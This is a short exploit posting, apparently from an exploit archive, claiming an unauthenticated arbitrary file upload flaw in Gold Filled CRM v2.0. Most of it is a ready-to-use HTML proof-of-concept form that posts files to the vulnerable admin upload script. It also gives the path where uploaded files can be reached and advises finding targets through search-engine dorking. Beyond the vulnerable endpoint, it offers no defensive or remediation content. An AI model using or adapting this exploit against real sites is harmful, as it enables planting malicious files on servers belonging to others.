Authored by indoushka

Gold Filled CRM version 2.0 suffers from an unauthenticated arbitrary file upload vulnerability.

====================================================================================================================================
| # Title : Gold Filled CRM v 2.0 Remote File Upload vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) |
| # Vendor : https://codecanyon.net/ |
| # Dork : |
====================================================================================================================================

poc :


[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code upload your file remotely

[+] infected file : /feltolt2.php .

[+] This is the path where you will find your uploaded files ( product_images/original/)Exmpl : /product_images/original/index.svg

[+] save code as poc.html .

<br>
<br>
<br>
<br>
<div class="center-block kozep">
<br>
<br>
<center>
<h2>Képek felvitele</h2>
<br>
<br>Termék azonosítója : <br>
<br>
<form action="http://127.0.0.1/goldfilledhu/admin/feltolt2.php" method="post" enctype="multipart/form-data" action="http://127.0.0.1/goldfilledhu/admin/feltolt2.php"><input type="file" name="files[]" multiple="multiple" accept="image/*"><br>
<input name="send" type="submit" value="Feltölt">
<input name="send" type="submit" value="Vissza">
</form>
<br>
<br></center>
</div>
</body>
</html>

Greetings to :=========================================================================================================================
|
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* |
|
=======================================================================================================================================